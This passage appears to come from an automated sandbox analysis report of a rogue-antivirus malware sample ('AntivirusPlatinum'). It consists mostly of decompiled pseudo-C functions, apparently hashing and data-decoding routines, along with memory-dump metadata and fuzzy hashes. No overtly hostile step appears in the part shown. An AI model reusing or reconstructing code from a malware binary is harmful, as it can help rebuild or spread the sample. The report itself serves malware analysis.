                                                                                                                                                  					_t214 = _t349 - 0xc; // 0x0
                                                                                                                                                  					_t218 = _t349 - 4; // 0x0
                                                                                                                                                  					asm("rol esi, 0x5");
                                                                                                                                                  					_t228 =  *((intOrPtr*)(_t418 +  *_t214 * 4 - 0x24)) + _t273 - 0x359d3e2a; // -882720298
                                                                                                                                                  					 *_v16 =  *_v16 + ( *(_t418 +  *_t218 * 4 - 0x24) ^  *(_t418 +  *_t349 * 4 - 0x24) ^  *_a8) + _t228;
                                                                                                                                                  					asm("ror dword [ecx], 0x2");
                                                                                                                                                  					_a12 = _a12 + 1;
                                                                                                                                                  					_t349 =  &(_t349[5]);
                                                                                                                                                  				} while (_t349 < 0x41f974);
                                                                                                                                                  				_t275 = _a4;
                                                                                                                                                  				_t331 =  &_v40 - _t275;
                                                                                                                                                  				_t350 = 5;
                                                                                                                                                  				do {
                                                                                                                                                  					 *_t275 =  *_t275 +  *((intOrPtr*)(_t331 + _t275));
                                                                                                                                                  					_t275 = _t275 + 4;
                                                                                                                                                  					_t350 = _t350 - 1;
                                                                                                                                                  				} while (_t350 != 0);
                                                                                                                                                  				return _t275;
                                                                                                                                                  			}




































                                                                                                                                                  0x0040d50c
                                                                                                                                                  0x0040d520
                                                                                                                                                  0x0040d50e
                                                                                                                                                  0x0040d513
                                                                                                                                                  0x0040d519
                                                                                                                                                  0x0040d519
                                                                                                                                                  0x0040d52a
                                                                                                                                                  0x0040d52c
                                                                                                                                                  0x0040d52e
                                                                                                                                                  0x0040d533
                                                                                                                                                  0x0040d533
                                                                                                                                                  0x0040d536
                                                                                                                                                  0x0040d539
                                                                                                                                                  0x0040d53c
                                                                                                                                                  0x0040d53f
                                                                                                                                                  0x0040d542
                                                                                                                                                  0x0040d544
                                                                                                                                                  0x0040d547
                                                                                                                                                  0x0040d54a
                                                                                                                                                  0x0040d54d
                                                                                                                                                  0x0040d550
                                                                                                                                                  0x0040d553
                                                                                                                                                  0x0040d556
                                                                                                                                                  0x0040d559
                                                                                                                                                  0x0040d55c
                                                                                                                                                  0x0040d561
                                                                                                                                                  0x0040d568
                                                                                                                                                  0x0040d563
                                                                                                                                                  0x0040d563
                                                                                                                                                  0x0040d563
                                                                                                                                                  0x0040d569
                                                                                                                                                  0x0040d571
                                                                                                                                                  0x0040d571
                                                                                                                                                  0x0040d57d
                                                                                                                                                  0x0040d581
                                                                                                                                                  0x0040d583
                                                                                                                                                  0x0040d588
                                                                                                                                                  0x0040d58b
                                                                                                                                                  0x0040d58b
                                                                                                                                                  0x0040d592
                                                                                                                                                  0x0040d59b
                                                                                                                                                  0x0040d5a4
                                                                                                                                                  0x0040d5a6
                                                                                                                                                  0x0040d5a8
                                                                                                                                                  0x0040d5ad
                                                                                                                                                  0x0040d5b1
                                                                                                                                                  0x0040d5b8
                                                                                                                                                  0x0040d5c0
                                                                                                                                                  0x0040d5c3
                                                                                                                                                  0x0040d5cc
                                                                                                                                                  0x0040d5cf
                                                                                                                                                  0x0040d5d6
                                                                                                                                                  0x0040d5de
                                                                                                                                                  0x0040d5f0
                                                                                                                                                  0x0040d5f5
                                                                                                                                                  0x0040d5f8
                                                                                                                                                  0x0040d5fb
                                                                                                                                                  0x0040d600
                                                                                                                                                  0x0040d604
                                                                                                                                                  0x0040d60b
                                                                                                                                                  0x0040d60e
                                                                                                                                                  0x0040d60e
                                                                                                                                                  0x0040d614
                                                                                                                                                  0x0040d617
                                                                                                                                                  0x0040d620
                                                                                                                                                  0x0040d62f
                                                                                                                                                  0x0040d631
                                                                                                                                                  0x0040d633
                                                                                                                                                  0x0040d635
                                                                                                                                                  0x0040d63a
                                                                                                                                                  0x0040d63e
                                                                                                                                                  0x0040d649
                                                                                                                                                  0x0040d64c
                                                                                                                                                  0x0040d655
                                                                                                                                                  0x0040d658
                                                                                                                                                  0x0040d65f
                                                                                                                                                  0x0040d667
                                                                                                                                                  0x0040d679
                                                                                                                                                  0x0040d67e
                                                                                                                                                  0x0040d681
                                                                                                                                                  0x0040d684
                                                                                                                                                  0x0040d68c
                                                                                                                                                  0x0040d694
                                                                                                                                                  0x0040d69b
                                                                                                                                                  0x0040d69d
                                                                                                                                                  0x0040d6a0
                                                                                                                                                  0x0040d6a0
                                                                                                                                                  0x0040d6a6
                                                                                                                                                  0x0040d6a9
                                                                                                                                                  0x0040d6ac
                                                                                                                                                  0x0040d6c1
                                                                                                                                                  0x0040d6c3
                                                                                                                                                  0x0040d6c5
                                                                                                                                                  0x0040d6c7
                                                                                                                                                  0x0040d6d0
                                                                                                                                                  0x0040d6d3
                                                                                                                                                  0x0040d6da
                                                                                                                                                  0x0040d6dd
                                                                                                                                                  0x0040d6e4
                                                                                                                                                  0x0040d6ef
                                                                                                                                                  0x0040d6fe
                                                                                                                                                  0x0040d705
                                                                                                                                                  0x0040d707
                                                                                                                                                  0x0040d70a
                                                                                                                                                  0x0040d70d
                                                                                                                                                  0x0040d710
                                                                                                                                                  0x0040d718
                                                                                                                                                  0x0040d71d
                                                                                                                                                  0x0040d724
                                                                                                                                                  0x0040d727
                                                                                                                                                  0x0040d72a
                                                                                                                                                  0x0040d72a
                                                                                                                                                  0x0040d730
                                                                                                                                                  0x0040d733
                                                                                                                                                  0x0040d73c
                                                                                                                                                  0x0040d74b
                                                                                                                                                  0x0040d74d
                                                                                                                                                  0x0040d74f
                                                                                                                                                  0x0040d751
                                                                                                                                                  0x0040d754
                                                                                                                                                  0x0040d75d
                                                                                                                                                  0x0040d765
                                                                                                                                                  0x0040d768
                                                                                                                                                  0x0040d76a
                                                                                                                                                  0x0040d76d
                                                                                                                                                  0x0040d770
                                                                                                                                                  0x0040d77b
                                                                                                                                                  0x0040d78b
                                                                                                                                                  0x0040d793
                                                                                                                                                  0x0040d79a
                                                                                                                                                  0x0040d7a2
                                                                                                                                                  0x0040d7a5
                                                                                                                                                  0x0040d7a8
                                                                                                                                                  0x0040d7b1
                                                                                                                                                  0x0040d7b1
                                                                                                                                                  0x0040d7ba
                                                                                                                                                  0x0040d7c1
                                                                                                                                                  0x0040d7c6
                                                                                                                                                  0x0040d7c9
                                                                                                                                                  0x0040d7c9
                                                                                                                                                  0x0040d7cf
                                                                                                                                                  0x0040d7d2
                                                                                                                                                  0x0040d7d5
                                                                                                                                                  0x0040d7ea
                                                                                                                                                  0x0040d7ec
                                                                                                                                                  0x0040d7ee
                                                                                                                                                  0x0040d7f0
                                                                                                                                                  0x0040d7f9
                                                                                                                                                  0x0040d7fc
                                                                                                                                                  0x0040d803
                                                                                                                                                  0x0040d806
                                                                                                                                                  0x0040d80d
                                                                                                                                                  0x0040d818
                                                                                                                                                  0x0040d827
                                                                                                                                                  0x0040d82e
                                                                                                                                                  0x0040d830
                                                                                                                                                  0x0040d833
                                                                                                                                                  0x0040d836
                                                                                                                                                  0x0040d839
                                                                                                                                                  0x0040d841
                                                                                                                                                  0x0040d849
                                                                                                                                                  0x0040d84b
                                                                                                                                                  0x0040d84c
                                                                                                                                                  0x0040d84f
                                                                                                                                                  0x0040d851
                                                                                                                                                  0x0040d854
                                                                                                                                                  0x0040d854
                                                                                                                                                  0x0040d85b

                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: EA
                                                                                                                                                  • API String ID: 0-1759796954
                                                                                                                                                  • Opcode ID: 8628abb3b80d9cb63cb5d0152fc648dc47c1fe5bfa02992019f208037f242e52
                                                                                                                                                  • Instruction ID: e36e1c60de2598ddb41f7bca5aedb0013dabc96c6f449a0bc5bfce457db8d824
                                                                                                                                                  • Opcode Fuzzy Hash: 8628abb3b80d9cb63cb5d0152fc648dc47c1fe5bfa02992019f208037f242e52
                                                                                                                                                  • Instruction Fuzzy Hash: 8CD14B72A0061ADFCF14CF58C884599B7F1FF8C318B2685ADD819AB245D731BA56CF84
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040A86C() {
                                                                                                                                                  				char _v104;
                                                                                                                                                  
                                                                                                                                                  				GetLocaleInfoA(0x400, 0xf,  &_v104, 0x64);
                                                                                                                                                  				return _v104;
                                                                                                                                                  			}




                                                                                                                                                  0x0040a87f
                                                                                                                                                  0x0040a88a

                                                                                                                                                  APIs
                                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000400,0000000F,?,00000064), ref: 0040A87F
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                  • Opcode ID: 829ba670a0fa1757a0144cb269cf4ad3e50a0cada9b3a97f802edfc538549171
                                                                                                                                                  • Instruction ID: c13786068502227b452c93a03eb0fb89719701edabe44a7bd0f48a7f58202c8b
                                                                                                                                                  • Opcode Fuzzy Hash: 829ba670a0fa1757a0144cb269cf4ad3e50a0cada9b3a97f802edfc538549171
                                                                                                                                                  • Instruction Fuzzy Hash: 9DC08CA064434D2EE710E3A05E07FAE7EFC4700B0AF000060FB09FB0C1D1E0DA2A866A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00407E0E(void* __ecx, signed int _a4) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				signed int _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				signed int _v20;
                                                                                                                                                  				signed char* _v24;
                                                                                                                                                  				signed int _v28;
                                                                                                                                                  				signed int _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				signed int _v40;
                                                                                                                                                  				signed int _v44;
                                                                                                                                                  				signed int _v48;
                                                                                                                                                  				signed int _v52;
                                                                                                                                                  				signed int _v56;
                                                                                                                                                  				intOrPtr _v60;
                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                  				intOrPtr _v68;
                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                  				intOrPtr _v80;
                                                                                                                                                  				signed int _v84;
                                                                                                                                                  				signed int _t227;
                                                                                                                                                  				signed int _t231;
                                                                                                                                                  				signed int _t242;
                                                                                                                                                  				signed int _t246;
                                                                                                                                                  				signed int _t247;
                                                                                                                                                  				signed int _t249;
                                                                                                                                                  				void* _t257;
                                                                                                                                                  				signed int _t260;
                                                                                                                                                  				signed int _t261;
                                                                                                                                                  				signed int _t265;
                                                                                                                                                  				signed int* _t283;
                                                                                                                                                  				signed int _t285;
                                                                                                                                                  				signed int _t286;
                                                                                                                                                  				signed int _t287;
                                                                                                                                                  				signed int _t288;
                                                                                                                                                  				signed int _t289;
                                                                                                                                                  				char _t291;
                                                                                                                                                  				signed int _t293;
                                                                                                                                                  				unsigned int _t298;
                                                                                                                                                  				void* _t299;
                                                                                                                                                  				signed int _t300;
                                                                                                                                                  				void* _t301;
                                                                                                                                                  				signed int _t302;
                                                                                                                                                  				signed int* _t304;
                                                                                                                                                  				signed int _t306;
                                                                                                                                                  				signed int _t311;
                                                                                                                                                  				signed int _t313;
                                                                                                                                                  				intOrPtr _t317;
                                                                                                                                                  				signed int _t322;
                                                                                                                                                  				signed int _t327;
                                                                                                                                                  				signed int _t328;
                                                                                                                                                  				char _t329;
                                                                                                                                                  				signed int _t330;
                                                                                                                                                  				void* _t332;
                                                                                                                                                  				signed int _t333;
                                                                                                                                                  				void* _t337;
                                                                                                                                                  				signed int _t342;
                                                                                                                                                  				signed int _t343;
                                                                                                                                                  				void* _t344;
                                                                                                                                                  				signed int _t345;
                                                                                                                                                  				void* _t346;
                                                                                                                                                  				signed int _t349;
                                                                                                                                                  				void* _t350;
                                                                                                                                                  				signed int _t355;
                                                                                                                                                  				signed int _t356;
                                                                                                                                                  				signed int _t357;
                                                                                                                                                  				signed int _t360;
                                                                                                                                                  				signed int _t361;
                                                                                                                                                  				void* _t364;
                                                                                                                                                  				signed int _t366;
                                                                                                                                                  				signed int* _t367;
                                                                                                                                                  				signed int _t368;
                                                                                                                                                  				signed char* _t369;
                                                                                                                                                  				signed int* _t370;
                                                                                                                                                  				signed int _t379;
                                                                                                                                                  				void* _t380;
                                                                                                                                                  				void* _t381;
                                                                                                                                                  				void* _t382;
                                                                                                                                                  
                                                                                                                                                  				_t330 = _a4;
                                                                                                                                                  				_t382 = _t381 - 0x50;
                                                                                                                                                  				_t364 = __ecx;
                                                                                                                                                  				if(_t330 <= 0) {
                                                                                                                                                  					L98:
                                                                                                                                                  					return _t227;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t330 <= 2) {
                                                                                                                                                  					_t227 =  *(__ecx + 0x20);
                                                                                                                                                  					_t304 =  *(__ecx + 0xc);
                                                                                                                                                  					_t366 =  *(__ecx + 0x28);
                                                                                                                                                  					__eflags = _t227 - 0x3c000;
                                                                                                                                                  					if(_t227 >= 0x3c000) {
                                                                                                                                                  						L97:
                                                                                                                                                  						goto L98;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t227 - 4;
                                                                                                                                                  					if(_t227 < 4) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t330 - 2;
                                                                                                                                                  					_a4 = _a4 & 0x00000000;
                                                                                                                                                  					_t349 = _t227 - 4;
                                                                                                                                                  					_t332 = (_t330 & 0xffffff00 | _t330 == 0x00000002) + 0xe8;
                                                                                                                                                  					__eflags = _t349;
                                                                                                                                                  					if(_t349 <= 0) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					} else {
                                                                                                                                                  						goto L87;
                                                                                                                                                  					}
                                                                                                                                                  					do {
                                                                                                                                                  						L87:
                                                                                                                                                  						_t227 =  *_t304;
                                                                                                                                                  						_t304 =  &(_t304[0]);
                                                                                                                                                  						_a4 = _a4 + 1;
                                                                                                                                                  						_t366 = _t366 + 1;
                                                                                                                                                  						__eflags = _t227 - 0xe8;
                                                                                                                                                  						if(_t227 == 0xe8) {
                                                                                                                                                  							L89:
                                                                                                                                                  							_t227 =  *_t304;
                                                                                                                                                  							__eflags = _t227;
                                                                                                                                                  							if(_t227 >= 0) {
                                                                                                                                                  								__eflags = _t227 - 0x1000000;
                                                                                                                                                  								if(_t227 >= 0x1000000) {
                                                                                                                                                  									L95:
                                                                                                                                                  									_a4 = _a4 + 4;
                                                                                                                                                  									_t304 =  &(_t304[1]);
                                                                                                                                                  									_t366 = _t366 + 4;
                                                                                                                                                  									__eflags = _t366;
                                                                                                                                                  									goto L96;
                                                                                                                                                  								}
                                                                                                                                                  								_t227 = _t227 - _t366;
                                                                                                                                                  								__eflags = _t227;
                                                                                                                                                  								L94:
                                                                                                                                                  								 *_t304 = _t227;
                                                                                                                                                  								goto L95;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t366 + _t227;
                                                                                                                                                  							if(_t366 + _t227 < 0) {
                                                                                                                                                  								goto L95;
                                                                                                                                                  							}
                                                                                                                                                  							_t227 = _t227 + 0x1000000;
                                                                                                                                                  							goto L94;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _t227 - _t332;
                                                                                                                                                  						if(_t227 != _t332) {
                                                                                                                                                  							goto L96;
                                                                                                                                                  						}
                                                                                                                                                  						goto L89;
                                                                                                                                                  						L96:
                                                                                                                                                  						__eflags = _a4 - _t349;
                                                                                                                                                  					} while (_a4 < _t349);
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t330 == 3) {
                                                                                                                                                  					_a4 =  *(__ecx + 0xc);
                                                                                                                                                  					_t227 =  *(__ecx + 0x20);
                                                                                                                                                  					__eflags = _t227 - 0x3c000;
                                                                                                                                                  					if(_t227 >= 0x3c000) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t227 - 0x15;
                                                                                                                                                  					if(_t227 < 0x15) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					_t227 = _t227 + 0xffffffeb;
                                                                                                                                                  					_t298 =  *(__ecx + 0x28) >> 4;
                                                                                                                                                  					__eflags = _t227;
                                                                                                                                                  					if(_t227 <= 0) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					_t231 = (_t227 - 1 >> 4) + 1;
                                                                                                                                                  					__eflags = _t231;
                                                                                                                                                  					_v48 = _t231;
                                                                                                                                                  					do {
                                                                                                                                                  						_t227 = ( *_a4 & 0x1f) - 0x10;
                                                                                                                                                  						__eflags = _t227;
                                                                                                                                                  						if(_t227 < 0) {
                                                                                                                                                  							goto L82;
                                                                                                                                                  						}
                                                                                                                                                  						_t227 =  *((intOrPtr*)(_t227 + 0x41408c));
                                                                                                                                                  						__eflags = _t227;
                                                                                                                                                  						if(_t227 == 0) {
                                                                                                                                                  							goto L82;
                                                                                                                                                  						}
                                                                                                                                                  						_t196 =  &_v32;
                                                                                                                                                  						 *_t196 = _v32 & 0x00000000;
                                                                                                                                                  						__eflags =  *_t196;
                                                                                                                                                  						_v56 = _t227 & 0x000000ff;
                                                                                                                                                  						_t350 = 0x12;
                                                                                                                                                  						do {
                                                                                                                                                  							_t227 = 1 << _v32;
                                                                                                                                                  							_t306 = _v56;
                                                                                                                                                  							__eflags = _t306 & 1;
                                                                                                                                                  							if((_t306 & 1) != 0) {
                                                                                                                                                  								_t203 = _t350 + 0x18; // 0x2a
                                                                                                                                                  								_t227 = E00407C4E(_t330, _a4, _t203, 4);
                                                                                                                                                  								__eflags = _t227 - 5;
                                                                                                                                                  								if(_t227 == 5) {
                                                                                                                                                  									__eflags = E00407C4E(_t330, _a4, _t350, 0x14) - _t298 & 0x000fffff;
                                                                                                                                                  									_t227 = E00407C9E(_t330, _a4, E00407C4E(_t330, _a4, _t350, 0x14) - _t298 & 0x000fffff, _t350, 0x14);
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							_v32 = _v32 + 1;
                                                                                                                                                  							_t350 = _t350 + 0x29;
                                                                                                                                                  							__eflags = _t350 - 0x64;
                                                                                                                                                  						} while (_t350 <= 0x64);
                                                                                                                                                  						L82:
                                                                                                                                                  						_a4 = _a4 + 0x10;
                                                                                                                                                  						_t298 = _t298 + 1;
                                                                                                                                                  						_t211 =  &_v48;
                                                                                                                                                  						 *_t211 = _v48 - 1;
                                                                                                                                                  						__eflags =  *_t211;
                                                                                                                                                  					} while ( *_t211 != 0);
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t330 == 4) {
                                                                                                                                                  					_t227 =  *(__ecx + 0x20);
                                                                                                                                                  					_t333 =  *(__ecx + 0x14);
                                                                                                                                                  					_t367 =  *(__ecx + 0xc);
                                                                                                                                                  					_t311 =  *(__ecx + 0x10) - 3;
                                                                                                                                                  					_v20 = _t227;
                                                                                                                                                  					_v56 = _t311;
                                                                                                                                                  					_v52 = _t333;
                                                                                                                                                  					_v32 = _t367;
                                                                                                                                                  					_t299 = _t367 + _t227;
                                                                                                                                                  					_t367[0xf008] = _t227;
                                                                                                                                                  					__eflags = _t227 - 0x1e000;
                                                                                                                                                  					if(_t227 >= 0x1e000) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					__eflags = _t333;
                                                                                                                                                  					if(_t333 < 0) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					_t132 =  &_v12;
                                                                                                                                                  					 *_t132 = _v12 & 0x00000000;
                                                                                                                                                  					__eflags =  *_t132;
                                                                                                                                                  					_v24 =  ~_t311;
                                                                                                                                                  					do {
                                                                                                                                                  						_t242 = _v20;
                                                                                                                                                  						_a4 = _a4 & 0x00000000;
                                                                                                                                                  						__eflags = _v12 - _t242;
                                                                                                                                                  						if(_v12 >= _t242) {
                                                                                                                                                  							goto L66;
                                                                                                                                                  						}
                                                                                                                                                  						_t368 = _v24;
                                                                                                                                                  						_v28 = _t368;
                                                                                                                                                  						_t369 = _t368 + _t299;
                                                                                                                                                  						_t313 = 3;
                                                                                                                                                  						_t246 = (_t242 - _v12 - 1) / _t313 + 1;
                                                                                                                                                  						__eflags = _t246;
                                                                                                                                                  						_v16 = _t246;
                                                                                                                                                  						do {
                                                                                                                                                  							__eflags = _v28 - 3;
                                                                                                                                                  							if(_v28 < 3) {
                                                                                                                                                  								L64:
                                                                                                                                                  								_t247 = _a4;
                                                                                                                                                  								goto L65;
                                                                                                                                                  							}
                                                                                                                                                  							_t351 =  *_t369 & 0x000000ff;
                                                                                                                                                  							_t250 =  *(_t369 - 3) & 0x000000ff;
                                                                                                                                                  							_v40 =  *_t369 & 0x000000ff;
                                                                                                                                                  							_v36 =  *(_t369 - 3) & 0x000000ff;
                                                                                                                                                  							_v48 = E0040A7CD(_t351 - _t250 + _a4 - _a4);
                                                                                                                                                  							_v44 = E0040A7CD(_t351 - _t250 + _a4 - _v40);
                                                                                                                                                  							_t257 = E0040A7CD(_t351 - _t250 + _a4 - _v36);
                                                                                                                                                  							_t382 = _t382 + 0xc;
                                                                                                                                                  							__eflags = _v48 - _v44;
                                                                                                                                                  							if(_v48 > _v44) {
                                                                                                                                                  								L61:
                                                                                                                                                  								__eflags = _v44 - _t257;
                                                                                                                                                  								if(_v44 > _t257) {
                                                                                                                                                  									_t247 = _v36;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t247 = _v40;
                                                                                                                                                  								}
                                                                                                                                                  								goto L65;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _v48 - _t257;
                                                                                                                                                  							if(_v48 <= _t257) {
                                                                                                                                                  								goto L64;
                                                                                                                                                  							}
                                                                                                                                                  							goto L61;
                                                                                                                                                  							L65:
                                                                                                                                                  							_v32 = _v32 + 1;
                                                                                                                                                  							_v28 = _v28 + 3;
                                                                                                                                                  							_t249 = _t247 -  *_v32 & 0x000000ff;
                                                                                                                                                  							_t369[_v56] = _t249;
                                                                                                                                                  							_t369 =  &(_t369[3]);
                                                                                                                                                  							_t171 =  &_v16;
                                                                                                                                                  							 *_t171 = _v16 - 1;
                                                                                                                                                  							__eflags =  *_t171;
                                                                                                                                                  							_a4 = _t249;
                                                                                                                                                  						} while ( *_t171 != 0);
                                                                                                                                                  						L66:
                                                                                                                                                  						_v12 = _v12 + 1;
                                                                                                                                                  						_v24 =  &(_v24[1]);
                                                                                                                                                  						__eflags = _v12 - 3;
                                                                                                                                                  					} while (_v12 < 3);
                                                                                                                                                  					_t227 = _v52;
                                                                                                                                                  					_t337 = _v20 + 0xfffffffe;
                                                                                                                                                  					while(1) {
                                                                                                                                                  						__eflags = _t227 - _t337;
                                                                                                                                                  						if(_t227 >= _t337) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						_t317 =  *((intOrPtr*)(_t227 + _t299 + 1));
                                                                                                                                                  						 *((intOrPtr*)(_t227 + _t299)) =  *((intOrPtr*)(_t227 + _t299)) + _t317;
                                                                                                                                                  						 *((intOrPtr*)(_t227 + _t299 + 2)) =  *((intOrPtr*)(_t227 + _t299 + 2)) + _t317;
                                                                                                                                                  						_t227 = _t227 + 3;
                                                                                                                                                  						__eflags = _t227;
                                                                                                                                                  					}
                                                                                                                                                  					goto L97;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t330 == 5) {
                                                                                                                                                  					_t355 =  *(__ecx + 0x20);
                                                                                                                                                  					_t227 =  *(__ecx + 0x10);
                                                                                                                                                  					_t370 =  *(__ecx + 0xc);
                                                                                                                                                  					_t318 = _t370 + _t355;
                                                                                                                                                  					_v44 = _t355;
                                                                                                                                                  					_v48 = _t227;
                                                                                                                                                  					_v24 = _t370;
                                                                                                                                                  					_v52 = _t370 + _t355;
                                                                                                                                                  					_t370[0xf008] = _t355;
                                                                                                                                                  					__eflags = _t355 - 0x1e000;
                                                                                                                                                  					if(_t355 >= 0x1e000) {
                                                                                                                                                  						goto L97;
                                                                                                                                                  					}
                                                                                                                                                  					_t300 = 0;
                                                                                                                                                  					__eflags = _t227;
                                                                                                                                                  					_v20 = 0;
                                                                                                                                                  					if(_t227 > 0) {
                                                                                                                                                  						goto L25;
                                                                                                                                                  						while(1) {
                                                                                                                                                  							L50:
                                                                                                                                                  							_v28 = _t260;
                                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                                  								break;
                                                                                                                                                  							}
                                                                                                                                                  							_t261 = _v36;
                                                                                                                                                  							_t356 = _t300;
                                                                                                                                                  							_t300 = _t261 - _v16;
                                                                                                                                                  							_t322 =  *_v24 & 0x000000ff;
                                                                                                                                                  							_v24 = _v24 + 1;
                                                                                                                                                  							_t342 = _v40;
                                                                                                                                                  							_v16 = _t261;
                                                                                                                                                  							_v56 = _t322;
                                                                                                                                                  							_t265 = (_t356 * _a4 + _v8 * _t300 + _v12 * _t261 + _t342 * 0x00000008 >> 0x00000003 & 0x000000ff) - _t322;
                                                                                                                                                  							 *((char*)(_v28 + _v52)) = _t265;
                                                                                                                                                  							_t318 = _t265 - _t342;
                                                                                                                                                  							_t377 = _v56 << 3;
                                                                                                                                                  							_v36 = _t265 - _t342;
                                                                                                                                                  							_v40 = _t265;
                                                                                                                                                  							_v84 = _v84 + E0040A7CD(_v56 << 3);
                                                                                                                                                  							_v80 = _v80 + E0040A7CD((_v56 << 3) - _v16);
                                                                                                                                                  							_v76 = _v76 + E0040A7CD(_v16 + (_v56 << 3));
                                                                                                                                                  							_v72 = _v72 + E0040A7CD((_v56 << 3) - _t300);
                                                                                                                                                  							_v68 = _v68 + E0040A7CD(_t377 + _t300);
                                                                                                                                                  							_v64 = _v64 + E0040A7CD(_t377 - _t356);
                                                                                                                                                  							_v60 = _v60 + E0040A7CD(_t377 + _t356);
                                                                                                                                                  							_t382 = _t382 + 0x1c;
                                                                                                                                                  							__eflags = _v32 & 0x0000001f;
                                                                                                                                                  							if((_v32 & 0x0000001f) != 0) {
                                                                                                                                                  								L49:
                                                                                                                                                  								_t260 = _v28 + _v48;
                                                                                                                                                  								_v32 = _v32 + 1;
                                                                                                                                                  								__eflags = _t260 - _v44;
                                                                                                                                                  								continue;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t379 = _v84;
                                                                                                                                                  								_t357 = 0;
                                                                                                                                                  								_v84 = 0;
                                                                                                                                                  								_t327 = 1;
                                                                                                                                                  								__eflags = 1;
                                                                                                                                                  								goto L28;
                                                                                                                                                  								L30:
                                                                                                                                                  								 *_t283 =  *_t283 & 0x00000000;
                                                                                                                                                  								_t327 = _t327 + 1;
                                                                                                                                                  								__eflags = _t327 - 7;
                                                                                                                                                  								if(_t327 < 7) {
                                                                                                                                                  									L28:
                                                                                                                                                  									_t283 = _t380 + _t327 * 4 - 0x50;
                                                                                                                                                  									_t343 =  *_t283;
                                                                                                                                                  									__eflags = _t343 - _t379;
                                                                                                                                                  									if(_t343 < _t379) {
                                                                                                                                                  										_t379 = _t343;
                                                                                                                                                  										_t357 = _t327;
                                                                                                                                                  									}
                                                                                                                                                  									goto L30;
                                                                                                                                                  								} else {
                                                                                                                                                  									_t285 = _t357 - 1;
                                                                                                                                                  									__eflags = _t285;
                                                                                                                                                  									if(_t285 == 0) {
                                                                                                                                                  										__eflags = _v12 - 0xfffffff0;
                                                                                                                                                  										if(_v12 >= 0xfffffff0) {
                                                                                                                                                  											_t110 =  &_v12;
                                                                                                                                                  											 *_t110 = _v12 - 1;
                                                                                                                                                  											__eflags =  *_t110;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t286 = _t285 - 1;
                                                                                                                                                  										__eflags = _t286;
                                                                                                                                                  										if(_t286 == 0) {
                                                                                                                                                  											__eflags = _v12 - 0x10;
                                                                                                                                                  											if(_v12 < 0x10) {
                                                                                                                                                  												_v12 = _v12 + 1;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											_t287 = _t286 - 1;
                                                                                                                                                  											__eflags = _t287;
